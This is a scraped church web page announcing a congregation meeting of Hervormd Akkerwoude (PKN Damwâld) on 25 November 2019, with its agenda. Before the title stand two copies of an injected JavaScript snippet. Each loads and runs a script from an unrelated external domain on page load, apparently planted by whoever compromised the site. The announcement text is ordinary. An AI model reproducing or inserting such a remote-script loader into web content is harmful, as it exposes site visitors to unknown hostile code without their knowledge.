;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Gemeenteavond Hervormd Akkerwoude c.a. - PKN Damwâld

Gemeenteavond Hervormd Akkerwoude c.a.

Gepubliceerd op: maandag 18 november 2019

De kerkenraad nodigt u van harte uit voor de gemeenteavond die gehouden zal worden op maandag 25 november 2019, 19.30 uur in ’t Skûlplak. Wij als kerkenraad vinden het fijn als er veel gemeenteleden aanwezig zijn op een gemeentevergadering, omdat het verbondenheid uitstraalt en omdat we dan het gevoel hebben dat gemeenteleden met ons mee willen denken. We staan er als kerkenraad niet alleen voor, gemeente-zijn en de koers die we willen varen is een zaak van ons allemaal. Daarnaast vinden we het belangrijk om elkaar in geloof te ontmoeten. Ook daar willen we op deze avond mee bezig zijn.

De kerkenraad is op dit moment druk bezig met o.a. het nieuwe beleidsplan, de werving van ambtsdragers en uiteraard alle andere kerkenraadszaken. We willen u graag een beeld schetsen van de voortgang ervan. Ook zal er een verkiezing van ambtsdragers plaatsvinden.  Wees welkom!

Agenda

  1. Opening
  2. Financiële verslagen
  3. Verkiezing ambtsdragers
  4. Beleidsplan
  5. Mededelingen kerkenraad
  6. Rondvraag
  7. Sluiting

 

Na afloop is er alle gelegenheid tot ontmoeting!